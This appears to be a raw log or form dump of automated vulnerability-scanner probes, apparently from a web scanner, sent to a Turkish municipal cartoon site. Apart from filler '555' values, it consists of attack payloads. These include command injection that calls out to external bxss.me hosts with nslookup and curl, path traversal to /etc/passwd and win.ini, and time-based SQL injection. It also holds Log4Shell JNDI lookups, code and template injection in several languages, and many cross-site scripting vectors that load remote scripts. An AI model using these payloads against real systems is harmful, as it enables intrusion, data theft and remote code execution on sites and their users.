;(nslookup -q=cname hithzhzaqjvvffd051.bxss.me||curl hithzhzaqjvvffd051.bxss.me)|(nslookup -q=cname hithzhzaqjvvffd051.bxss.me||curl hithzhzaqjvvffd051.bxss.me)&(nslookup -q=cname hithzhzaqjvvffd051.bxss.me||curl hithzhzaqjvvffd051.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hiteubedpfkid4384d.bxss.me||curl${IFS}hiteubedpfkid4384d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpeflybfvwmf4762.bxss.me||curl${IFS}hitpeflybfvwmf4762.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpeflybfvwmf4762.bxss.me||curl${IFS}hitpeflybfvwmf4762.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
wyahupqF
MyJVFnUR: ujcdtij2
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
../555
555
555
555
555
555
555
555
555
bcc:009365.174607-7483.174607.a0868.20353.2@bxss.me
to@example.com>
bcc:009365.174607-7484.174607.a0868.20353.2@bxss.me
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
${9999228+9999699}
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
555
555
555
555
555
555
555
555&n952305=v978366
555
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
'"()
555'&&sleep(27*1000)*edwmtz&&'
555"&&sleep(27*1000)*lkwovu&&"
555'||sleep(27*1000)*wbcqzj||'
555"||sleep(27*1000)*vifbmj||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hittr'.'xemdxhocfe124.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(84).chr(118).chr(66).'
".gethostbyname(lc("hitsr"."ibkbgggpe0bdd.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(88).chr(107).chr(84)."
gethostbyname(lc('hitak'.'dydzthag1ff67.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(70).chr(120).chr(70)
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitmplyghyuvlaf709.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitmplyghyuvlaf709."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitmplyghyuvlaf709.'+'bxss.me')+"
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
"+"A".concat(70-3).concat(22*4).concat(100).concat(84).concat(115).concat(66)+(require"socket"
Socket.gethostbyname("hitcs"+"sabmwtayb7007.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(120).concat(78).concat(100).concat(73)+(require'socket'
Socket.gethostbyname('hityr'+'aubcawrl17e82.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(114).concat(83).concat(100).concat(84)+(require'socket'
Socket.gethostbyname('hitwj'+'iqevpzsm3a6b3.bxss.me.')[3].to_s)
555
555
555
nopcommerce-new-release
nopcommerce-new-release/.
555
555
http://hitldyqbmhfiy.bxss.me/
hitldyqbmhfiy.bxss.me
555
555
'"></style></textarea></iframe></script><iframe src="https://hitnwbwzvoifa.bxss.me"></iframe><link rel=attachment href="https://hitnwbwzvoifa.bxss.me">
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
https://karikatur.bcekmece.bel.tr/
karikatur.bcekmece.bel.tr
555
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >bR5J(9718)</ScRiPt>
'"()&%<zzz><ScRiPt >bR5J(9421)</ScRiPt>
5559134657
bfg4417<s1﹥s2ʺs3ʹhjl4417
bfgx1134%C0%BEz1%C0%BCz2a%90bcxhjl1134
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >bR5J(9649)</ScRiPt>
555<WM9CMY>1RL2Z[!+!]</WM9CMY>
555<script>bR5J(9567)</script>
555<script>bR5J(9265)</script>9265
555<ScR<ScRiPt>IpT>bR5J(9950)</sCr<ScRiPt>IpT>
555<ScRiPt
>bR5J(9460)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9114></ScRiPt>
555<isindex type=image src=1 onerror=bR5J(9806)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9698'>
555<body onload=bR5J(9118)>
555<img src=//xss.bxss.me/t/dot.gif onload=bR5J(9152)>
555<img src=xyz OnErRor=bR5J(9151)>
555<img/src=">" onerror=alert(9520)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%62%52%35%4A%289525%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\bR5J(9876)\u003C/sCripT\u003E
555<ScRiPt>bR5J(9994)</sCripT>
%F6<img zzz onmouseover=bR5J(94551) //%F6>
555<input autofocus onfocus=bR5J(9912)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(bR5J(9327))}
555G6wbw
<ScRiPt >bR5J(9797)</ScRiPt>
555<WLVGUO>IXV8G[!+!]</WLVGUO>
555<ifRAme sRc=9989.com></IfRamE>
555<aJM4wUy x=9347>
555<img sRc='http://attacker-9474/log.php?
555<aadVsiJ<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555dbkbvjjP'; waitfor delay '0:0:15' --
555wJkoU5jy'); waitfor delay '0:0:15' --
5556QxdL2Yg')); waitfor delay '0:0:15' --
555-1 OR 529=(SELECT 529 FROM PG_SLEEP(15))--
555-1) OR 861=(SELECT 861 FROM PG_SLEEP(15))--
555-1)) OR 461=(SELECT 461 FROM PG_SLEEP(15))--
555yNyyIdNh' OR 46=(SELECT 46 FROM PG_SLEEP(15))--
555ku7jno6f') OR 181=(SELECT 181 FROM PG_SLEEP(15))--
555
5559RsIsWhM')) OR 68=(SELECT 68 FROM PG_SLEEP(15))--
555'"()&%<zzz><ScRiPt >D7K3(9950)</ScRiPt>
555
'"()&%<zzz><ScRiPt >D7K3(9809)</ScRiPt>
555
5559141866
555
555
555
555
555
555
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitwwqdcrtbdg2f796${::-.}bxss.me}zzzz${url:UTF-8:http://hitheiojukvws.bxss.me/}
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hituaueeltumu05e2a${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.174607-7654.174607.a0868${::-.}1${::-.}bxss.me}}
555
555
response.write(9783715*9434922)
'+response.write(9783715*9434922)+'
"+response.write(9783715*9434922)+"
<% response.write(9783715*9434922) %>
+response.write(9783715*9434922)'
555
555
555
555
555
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=009365&r=174607-7657&h=174607-a0868-2&"></script>
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
echo kxoirq$()\ afltvg\nz^xyu||a #' &echo kxoirq$()\ afltvg\nz^xyu||a #|" &echo kxoirq$()\ afltvg\nz^xyu||a #
&echo kxoifi$()\ bgfipg\nz^xyu||a #' &echo kxoifi$()\ bgfipg\nz^xyu||a #|" &echo kxoifi$()\ bgfipg\nz^xyu||a #
555&echo kfrkcf$()\ wxxvjs\nz^xyu||a #' &echo kfrkcf$()\ wxxvjs\nz^xyu||a #|" &echo kfrkcf$()\ wxxvjs\nz^xyu||a #
|echo xwyepe$()\ xjxutb\nz^xyu||a #' |echo xwyepe$()\ xjxutb\nz^xyu||a #|" |echo xwyepe$()\ xjxutb\nz^xyu||a #
555|echo vrucaz$()\ wwqkye\nz^xyu||a #' |echo vrucaz$()\ wwqkye\nz^xyu||a #|" |echo vrucaz$()\ wwqkye\nz^xyu||a #
(nslookup -q=cname hitiqkpbhhqpq0a26e.bxss.me||curl hitiqkpbhhqpq0a26e.bxss.me))
$(nslookup -q=cname hithnlunulksq7bbf6.bxss.me||curl hithnlunulksq7bbf6.bxss.me)
&nslookup -q=cname hittjyuujearq93d2b.bxss.me&'\"`0&nslookup -q=cname hittjyuujearq93d2b.bxss.me&`'
&(nslookup -q=cname hitmawasqleus7e62d.bxss.me||curl hitmawasqleus7e62d.bxss.me)&'\"`0&(nslookup -q=cname hitmawasqleus7e62d.bxss.me||curl hitmawasqleus7e62d.bxss.me)&`'
|(nslookup -q=cname hitagrtakviitbd885.bxss.me||curl hitagrtakviitbd885.bxss.me)
`(nslookup -q=cname hittznmaixmcp81ef3.bxss.me||curl hittznmaixmcp81ef3.bxss.me)`
;(nslookup -q=cname hitqbnnqoulkzc73bc.bxss.me||curl hitqbnnqoulkzc73bc.bxss.me)|(nslookup -q=cname hitqbnnqoulkzc73bc.bxss.me||curl hitqbnnqoulkzc73bc.bxss.me)&(nslookup -q=cname hitqbnnqoulkzc73bc.bxss.me||curl hitqbnnqoulkzc73bc.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitnvqzjngljrb3a05.bxss.me||curl${IFS}hitnvqzjngljrb3a05.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitvnzxgjtyjxbde69.bxss.me||curl${IFS}hitvnzxgjtyjxbde69.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvnzxgjtyjxbde69.bxss.me||curl${IFS}hitvnzxgjtyjxbde69.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
NXvSMFRI
SaELGVBG: z2NcLWNv
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
../555
555
555
555
555
555
555
555
bcc:009365.174607-7660.174607.a0868.20353.2@bxss.me
to@example.com>
bcc:009365.174607-7661.174607.a0868.20353.2@bxss.me
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
${10000493+9999943}
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
555
555
555
555
555
555
555
555&n968187=v977352
555
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
'"()
555'&&sleep(27*1000)*qebqtm&&'
555"&&sleep(27*1000)*kgvqsm&&"
555'||sleep(27*1000)*jfdgfj||'
555"||sleep(27*1000)*kelxmf||"
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitot'.'lgcrnqlg1634d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(75).chr(107).chr(84).'
".gethostbyname(lc("hityn"."lmlkqbxnc835b.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(87).chr(105).chr(81)."
gethostbyname(lc('hitmj'.'vnmvanbj93424.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(90).chr(100).chr(68)
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitdsvfyzebmz8d932.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitdsvfyzebmz8d932."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitdsvfyzebmz8d932.'+'bxss.me')+"
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(83).concat(102).concat(86)+(require"socket"
Socket.gethostbyname("hitjd"+"jbpinmaa8ac5f.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(121).concat(65).concat(110).concat(88)+(require'socket'
Socket.gethostbyname('hitlf'+'zuqrzxlo8ad72.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(107).concat(75).concat(116).concat(90)+(require'socket'
Socket.gethostbyname('hitkp'+'siogglts7c67d.bxss.me.')[3].to_s)
555
555
555
nopcommerce-new-release
nopcommerce-new-release/.
555
555
http://hitumcpwznmne.bxss.me/
hitumcpwznmne.bxss.me
555
555
'"></style></textarea></iframe></script><iframe src="https://hitwhkzngtepa.bxss.me"></iframe><link rel=attachment href="https://hitwhkzngtepa.bxss.me">
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
https://karikatur.bcekmece.bel.tr/
karikatur.bcekmece.bel.tr
555
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >4wb0(9302)</ScRiPt>
'"()&%<zzz><ScRiPt >4wb0(9440)</ScRiPt>
5559793328
bfg7260<s1﹥s2ʺs3ʹhjl7260
bfgx4603%C0%BEz1%C0%BCz2a%90bcxhjl4603
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >4wb0(9626)</ScRiPt>
555<WK9AIQ>FTPPQ[!+!]</WK9AIQ>
555<script>4wb0(9371)</script>
555<script>4wb0(9036)</script>9036
555<ScR<ScRiPt>IpT>4wb0(9833)</sCr<ScRiPt>IpT>
555<ScRiPt
>4wb0(9322)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9490></ScRiPt>
555<isindex type=image src=1 onerror=4wb0(9012)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9482'>
555<body onload=4wb0(9758)>
555<img src=//xss.bxss.me/t/dot.gif onload=4wb0(9357)>
555<img src=xyz OnErRor=4wb0(9542)>
555<img/src=">" onerror=alert(9044)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%34%77%62%30%289186%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\4wb0(9857)\u003C/sCripT\u003E
555<ScRiPt>4wb0(9567)</sCripT>
%F6<img zzz onmouseover=4wb0(94361) //%F6>
555<input autofocus onfocus=4wb0(9554)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(4wb0(9560))}
5559G6Qi
<ScRiPt >4wb0(9476)</ScRiPt>
555<WZ4XVB>AD7VT[!+!]</WZ4XVB>
555<ifRAme sRc=9662.com></IfRamE>
555<aT9xXP9 x=9329>
555<img sRc='http://attacker-9144/log.php?
555<ahGpLYu<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+326-326-1=0+0+0+1 --
-1 OR 2+68-68-1=0+0+0+1
-1' OR 2+635-635-1=0+0+0+1 --
-1' OR 2+707-707-1=0+0+0+1 or 'nCivqA7m'='
-1" OR 2+412-412-1=0+0+0+1 --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555*if(now()=sysdate(),sleep(15),0)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@HnFnQ
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555'"()&%<zzz><ScRiPt >wo8d(9372)</ScRiPt>
555
555
555
'"()&%<zzz><ScRiPt >wo8d(9651)</ScRiPt>
555
555
555
555
5559132385
555
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hityenkqqqrpnbc632${::-.}bxss.me}zzzz${url:UTF-8:http://hitxniibbypye.bxss.me/}
response.write(9207848*9199668)
'+response.write(9207848*9199668)+'
"+response.write(9207848*9199668)+"
<% response.write(9207848*9199668) %>
+response.write(9207848*9199668)'
555
555
555
555
555
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitrjavkyqytl25bf8${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.009365.174607-7729.174607.a0868${::-.}1${::-.}bxss.me}}
555
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=009365&r=174607-7731&h=174607-a0868-2&"></script>
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
echo ivsrat$()\ tslaan\nz^xyu||a #' &echo ivsrat$()\ tslaan\nz^xyu||a #|" &echo ivsrat$()\ tslaan\nz^xyu||a #
&echo hekdbp$()\ dhnous\nz^xyu||a #' &echo hekdbp$()\ dhnous\nz^xyu||a #|" &echo hekdbp$()\ dhnous\nz^xyu||a #
555&echo fosjtm$()\ ktdkll\nz^xyu||a #' &echo fosjtm$()\ ktdkll\nz^xyu||a #|" &echo fosjtm$()\ ktdkll\nz^xyu||a #
|echo oykitb$()\ lfctvd\nz^xyu||a #' |echo oykitb$()\ lfctvd\nz^xyu||a #|" |echo oykitb$()\ lfctvd\nz^xyu||a #
555|echo dvsudi$()\ lngmph\nz^xyu||a #' |echo dvsudi$()\ lngmph\nz^xyu||a #|" |echo dvsudi$()\ lngmph\nz^xyu||a #
(nslookup -q=cname hitcagzcvpfacd2c56.bxss.me||curl hitcagzcvpfacd2c56.bxss.me))
$(nslookup -q=cname hitardcgbyheu89724.bxss.me||curl hitardcgbyheu89724.bxss.me)
&nslookup -q=cname hitafvmwrebflf678d.bxss.me&'\"`0&nslookup -q=cname hitafvmwrebflf678d.bxss.me&`'
&(nslookup -q=cname hitcfcezjyqzm2dff5.bxss.me||curl hitcfcezjyqzm2dff5.bxss.me)&'\"`0&(nslookup -q=cname hitcfcezjyqzm2dff5.bxss.me||curl hitcfcezjyqzm2dff5.bxss.me)&`'
OL29tLcv
ShnSQ2wS: nYFaTmzJ
|(nslookup -q=cname hitkqbcxoavjb9e3a7.bxss.me||curl hitkqbcxoavjb9e3a7.bxss.me)
555
555
`(nslookup -q=cname hitekougjrovv482bd.bxss.me||curl hitekougjrovv482bd.bxss.me)`
;(nslookup -q=cname hitfuasugunpi6ede9.bxss.me||curl hitfuasugunpi6ede9.bxss.me)|(nslookup -q=cname hitfuasugunpi6ede9.bxss.me||curl hitfuasugunpi6ede9.bxss.me)&(nslookup -q=cname hitfuasugunpi6ede9.bxss.me||curl hitfuasugunpi6ede9.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitakesiwplegfa1cc.bxss.me||curl${IFS}hitakesiwplegfa1cc.bxss.me)
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555
../555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitvmdhhisuri0d8df.bxss.me||curl${IFS}hitvmdhhisuri0d8df.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvmdhhisuri0d8df.bxss.me||curl${IFS}hitvmdhhisuri0d8df.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bcc:009365.174607-7735.174607.a0868.20353.2@bxss.me
to@example.com>
bcc:009365.174607-7736.174607.a0868.20353.2@bxss.me
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
${9999525+9999202}
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
555
555
555
555
555
555
555
555
555
555&n979072=v917529
555
555
)
!(()&&!|*|*|
^(#$!@#$)(()))******
555
555
555
555
'"()
555'&&sleep(27*1000)*egjhfe&&'
555"&&sleep(27*1000)*sklcov&&"
555'||sleep(27*1000)*ktfjuw||'
555"||sleep(27*1000)*bfdujo||"
'.gethostbyname(lc('hitdh'.'rhuedrxd8adf9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(69).chr(98).chr(90).'
555
".gethostbyname(lc("hitsf"."lgpdopunbf2d2.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(83).chr(117).chr(83)."
555
gethostbyname(lc('hittt'.'odwlzryi4e2b7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(86).chr(112).chr(80)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitysdvxqldor494d7.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitysdvxqldor494d7."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitysdvxqldor494d7.'+'bxss.me')+"
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(107).concat(66).concat(105).concat(84)+(require"socket"
Socket.gethostbyname("hitqb"+"hwjmtngj6c200.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(121).concat(80).concat(121).concat(69)+(require'socket'
Socket.gethostbyname('hitks'+'atpybizc196af.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(118).concat(86).concat(116).concat(72)+(require'socket'
Socket.gethostbyname('hitia'+'emeciqxsd2b26.bxss.me.')[3].to_s)
nopcommerce-new-release
555
nopcommerce-new-release/.
555
555
555
555
http://hitqjssmrklyf.bxss.me/
hitqjssmrklyf.bxss.me
555
555
'"></style></textarea></iframe></script><iframe src="https://hitqwyfbbcmao.bxss.me"></iframe><link rel=attachment href="https://hitqwyfbbcmao.bxss.me">
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
https://karikatur.bcekmece.bel.tr/
karikatur.bcekmece.bel.tr
555
555
'"
<!--
555
555
555'"()&%<zzz><ScRiPt >Ap0T(9366)</ScRiPt>
'"()&%<zzz><ScRiPt >Ap0T(9704)</ScRiPt>
5559519072
bfg3081<s1﹥s2ʺs3ʹhjl3081
bfgx4408%C0%BEz1%C0%BCz2a%90bcxhjl4408
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >Ap0T(9482)</ScRiPt>
555<WANRK1>BD19P[!+!]</WANRK1>
555<script>Ap0T(9212)</script>
555<script>Ap0T(9349)</script>9349
555<ScR<ScRiPt>IpT>Ap0T(9268)</sCr<ScRiPt>IpT>
555<ScRiPt
>Ap0T(9676)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9576></ScRiPt>
555<isindex type=image src=1 onerror=Ap0T(9709)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9668'>
555<body onload=Ap0T(9587)>
555<img src=//xss.bxss.me/t/dot.gif onload=Ap0T(9201)>
555<img src=xyz OnErRor=Ap0T(9752)>
555<img/src=">" onerror=alert(9295)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%41%70%30%54%289372%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Ap0T(9569)\u003C/sCripT\u003E
555<ScRiPt>Ap0T(9434)</sCripT>
%F6<img zzz onmouseover=Ap0T(94191) //%F6>
555<input autofocus onfocus=Ap0T(9099)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(Ap0T(9131))}
5553EAPw
<ScRiPt >Ap0T(9489)</ScRiPt>
555<W9PAXP>AMAYM[!+!]</W9PAXP>
555<ifRAme sRc=9729.com></IfRamE>
555<aAsnPaq x=9129>
555<img sRc='http://attacker-9004/log.php?
555<an3ZSea<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
-1 OR 2+604-604-1=0+0+0+1 --
-1 OR 2+974-974-1=0+0+0+1
-1' OR 2+76-76-1=0+0+0+1 --
-1' OR 2+79-79-1=0+0+0+1 or 'ELCDAqL0'='
-1" OR 2+190-190-1=0+0+0+1 --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555*if(now()=sysdate(),sleep(15),0)
555-1; waitfor delay '0:0:15' --
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555-1); waitfor delay '0:0:15' --
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555-1)); waitfor delay '0:0:15' --
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1 waitfor delay '0:0:15' --
555
555-1; waitfor delay '0:0:15' --
555BoMs3EVL'; waitfor delay '0:0:15' --
555
555-1); waitfor delay '0:0:15' --
555ayA2Lx0n'); waitfor delay '0:0:15' --
555
555-1)); waitfor delay '0:0:15' --
555LYqXi0mf')); waitfor delay '0:0:15' --
555
555-1 waitfor delay '0:0:15' --
555-1 OR 964=(SELECT 964 FROM PG_SLEEP(15))--
555
555KHUwfuRB'; waitfor delay '0:0:15' --
555-1) OR 228=(SELECT 228 FROM PG_SLEEP(15))--
555
555ElgvYiPN'); waitfor delay '0:0:15' --
555-1)) OR 166=(SELECT 166 FROM PG_SLEEP(15))--
555
555mS47MkU4')); waitfor delay '0:0:15' --
5556D6Dd8e8' OR 100=(SELECT 100 FROM PG_SLEEP(15))--
555
555-1 OR 446=(SELECT 446 FROM PG_SLEEP(15))--
555nSzh42cF') OR 707=(SELECT 707 FROM PG_SLEEP(15))--
555
555-1) OR 51=(SELECT 51 FROM PG_SLEEP(15))--
555yVKJzVKE')) OR 737=(SELECT 737 FROM PG_SLEEP(15))--
555
555
555
555
555-1)) OR 985=(SELECT 985 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555X87EOJF2' OR 733=(SELECT 733 FROM PG_SLEEP(15))--
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@cej93
555
555n5kbl3xB') OR 140=(SELECT 140 FROM PG_SLEEP(15))--
555
55588rWm1oX')) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@8msoW
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555